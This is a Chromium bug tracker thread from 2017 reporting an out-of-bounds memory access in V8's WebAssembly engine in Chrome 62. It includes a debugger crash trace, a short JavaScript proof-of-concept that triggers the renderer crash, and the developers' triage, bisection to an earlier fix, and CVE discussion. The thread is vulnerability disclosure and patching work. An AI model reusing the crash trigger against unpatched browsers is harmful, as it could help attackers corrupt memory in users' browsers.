Issue metadata
Sign in to add a comment
|
Security:V8:OOB Read Write In WebAssembly
Reported by
soulchen...@gmail.com,
Nov 7 2017
|
||||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
This is a OOB Read Write Problem in V8:WebAssembly.It will cause the JIT code base address multiply by 2.It cause a security problem.
VERSION
Chrome Version: 62.0.3202.89 Stable
Operating System: Windows 10 1703 64bit
REPRODUCTION CASE
In the zip file |ppoc.zip|,pass is :dabaodabao
0:014> g
(1b84.acc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
1a206639 8b0401 mov eax,dword ptr [ecx+eax] ds:002b:86c092f0=????????
0:000:x86> bt
^ Operation not supported in current debug session 'bt'
0:000:x86> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0073ea34 1a2066cd 0000034e 258e3af5 258ec389 0x1a206639
0073eadc 652fbdc8 1bb8417d 258e3ad1 0b410535 0x1a2066cd
0073eb5c 652fbcd8 00000000 0521a418 0521a510 chrome_child!ovly_debug_event+0x43ac8
0073eb90 65258eae 0521a418 0521a510 00000000 chrome_child!ovly_debug_event+0x439d8
0073ec20 6549c407 0073ec94 0521a508 28f221d8 chrome_child+0xd8eae
0073ecd8 6549c2e7 0521a418 28f221d8 516411c0 chrome_child!ovly_debug_event+0x1e4107
0073ed30 6549c1e2 0073ed58 0521a3e8 2b043ac4 chrome_child!ovly_debug_event+0x1e3fe7
0073ed80 6549d077 0073edb4 2b043ac4 00000001 chrome_child!ovly_debug_event+0x1e3ee2
0073eda8 6549d043 2b043ac4 00000001 0073edf4 chrome_child!ovly_debug_event+0x1e4d77
0073edb8 6552a2f9 4c021b98 51684190 3f5aa160 chrome_child!ovly_debug_event+0x1e4d43
0073edf4 6552a113 00000000 3f5aa160 00000000 chrome_child!ChromeMain+0xb823
0073ee20 6534067d 2b043a70 0073ee98 3f5aa160 chrome_child!ChromeMain+0xb63d
0073efa0 6552e6d7 0073f0b0 28f22158 349f408c chrome_child!ovly_debug_event+0x8837d
0073f080 6552e56c 28f22a88 0073f0b0 4c028a90 chrome_child!ChromeMain+0xfc01
0073f098 6552e542 28f22a58 0073f0b0 4c028a90 chrome_child!ChromeMain+0xfa96
0073f0b8 6538231c 00000000 4c028a90 4c028ca8 chrome_child!ChromeMain+0xfa6c
0073f114 653cf680 00000000 0073f19c 08196d08 chrome_child!ovly_debug_event+0xca01c
0073f16c 6547a178 08196d08 081885b8 6547a15e chrome_child!ovly_debug_event+0x117380
0073f19c 652b5545 08188598 00000000 652b54e4 chrome_child!ovly_debug_event+0x1c1e78
0073f2b0 652ab287 674ead0c 0073f2e0 0073f430 chrome_child+0x135545
0073f40c 652b69d3 10ddbdfa 00000092 0073f448 chrome_child+0x12b287
0073f4d8 6538f224 00000000 052d5ea0 00000000 chrome_child+0x1369d3
0073f4ec 652b5545 052d5ea0 00000000 652b54e4 chrome_child!ovly_debug_event+0xd6f24
0073f600 652ab9f2 6754f5f4 0073f6f8 0519f058 chrome_child+0x135545
0073f67c 652b5a12 0073f6f8 051a02d8 0519f018 chrome_child+0x12b9f2
0073f740 652ba344 67a55c54 674f0ad0 00000000 chrome_child+0x135a12
0073f794 65448740 0519f018 0073f860 654486f7 chrome_child!ovly_debug_event+0x2044
0073f828 65532a60 0073f948 00000003 0073f95c chrome_child!ovly_debug_event+0x190440
0073f90c 65520ae5 0073f948 052d6290 0519ba78 chrome_child!ChromeMain+0x13f8a
0073f924 65520992 0073fa84 00000003 0073fa2c chrome_child!ChromeMain+0x200f
0073f978 6551ef96 0073fa48 0073fa84 6751a724 chrome_child!ChromeMain+0x1ebc
0073fa18 6551ec43 0073fad8 00900000 00000000 chrome_child!ChromeMain+0x4c0
0073fa50 6551ebdc 04bba090 00000008 00000007 chrome_child!ChromeMain+0x16d
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\BoA\Desktop\Chrome\Application\chrome.exe -
0073fab0 00905a2f 00900000 0073fad8 10dc63d1 chrome_child!ChromeMain+0x106
0073fb5c 00902213 00900000 10dc63d1 00000092 chrome+0x5a2f
0073fc9c 009a0da8 00900000 00000000 007b1da4 chrome+0x2213
*** ERROR: Symbol file could not be found. Defaulted to export symbols for KERNEL32.dll -
0073fce8 76b18744 00523000 76b18720 4be628e5 chrome!IsSandboxedProcess+0x43478
0073fcfc 7713582d 00523000 16274235 00000000 KERNEL32!BaseThreadInitThunk+0x24
0073fd44 771357fd ffffffff 7715636e 00000000 ntdll_770d0000!RtlGetAppContainerNamedObjectPath+0xfd
0073fd54 00000000 009a0e20 00523000 00000000 ntdll_770d0000!RtlGetAppContainerNamedObjectPath+0xcd
,
Nov 8 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5458374069321728.
,
Nov 8 2017
Clusterfuzz can't reproduce. mstarzinger could you please help try to reproduce/triage? Thanks!
,
Nov 9 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=4897656852971520.
,
Nov 9 2017
Note that the PoC file says: // Flags: --expose-wasm So, lack of that flag might be why CF couldn't reproduce the problem. I'm trying a fresh testcase. Security_Impact-None for that reason (WASM is not on by default in production builds yet). If reproducible, severity will perhaps be High, though.
,
Nov 9 2017
Actually, yes, WASM is on by default.
,
Nov 9 2017
#5 This PoC can reproduce with the latest Chrome stable version(62.0.3202.89 Stable). You can open the html file directly with default settings.And the render process will crash.
,
Nov 9 2017
Actually,you only need to focus on the following code in the PoC:
var builder = new WasmModuleBuilder();
builder.addMemory(0, 333);
builder.addFunction('evil', kSig_i_v)
.addBody([
kExprI32Const, 0x3f,
kExprGrowMemory, 0x00,
kExprI32LoadMem, 0x00, 0xf0, 0x25,
])
.exportFunc();
var module = new WebAssembly.Module(builder.toBuffer());
var i1 = new WebAssembly.Instance(module);
try{i1.exports.evil();}catch(e){};
var i2 = new WebAssembly.Instance(module);
alert("1");
i2.exports.evil();
Other JS code is belongs to the V8 wasm lib js code for testing.
,
Nov 9 2017
I also cannot reproduce. The meat of this is:
.addBody([
kExprI32Const, 0x3f,
kExprGrowMemory, 0x00,
kExprI32LoadMem, 0x00, 0xf0, 0x25,
Which doesn't really have anything out of the ordinary.
,
Nov 9 2017
Ah, this crashes in Chrome but not in the latest d8. Assigning to ahaas@ to take a look, as I am not sure if this is before we moved to use the WasmContext. Deepti, can you also take a look?
,
Nov 9 2017
,
Nov 9 2017
This was actually fixed in 327df0b8c2831ae60ce492221754bba7b54de492 (https://crrev.com/c/674707) according to local bisect. The fix was not merged back to 62, but it will be contained in 63.
,
Nov 9 2017
I think we should merge this back to 62. I am wondering though why the impact on 62 was not identified in https://bugs.chromium.org/p/chromium/issues/detail?id=763439&can=2&q=763439 already?
,
Nov 9 2017
,
Nov 9 2017
Could you help to assign a CVE to this issue? Because you don't merged and fix this in the M62 stable Version now and you consider this is a "Null-dereference READ" problem not a security problem before I report to you. You probably don't identify the impact on 62 stable version and will not fix this if I don't report to you. Thanks
,
Nov 9 2017
Assigning a CVE will encourage us to report the problem to you immediately if we encounter similar situation in the future.
,
Nov 9 2017
,
Nov 9 2017
,
Nov 10 2017
Hi soulchen8650@ - thanks for the report, and for pointing out that this also affected 62. I'm afraid, however, that since this was indeed a duplicate submission and hence doesn't qualify for a CVE allocation. By the way, did you find this by fuzzing? If so then you check out the Chrome Fuzzer Program at g.co/ChromeBugRewards. If you submit your fuzzer to us, we will run it at scale and automatically consider any security bugs it finds for both CVE allocation and VRP payment (which would include a $500 bonus for just being part of the program). Let me know if you'd like more details.
,
Nov 13 2017
,
Feb 15 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Nov 8 2017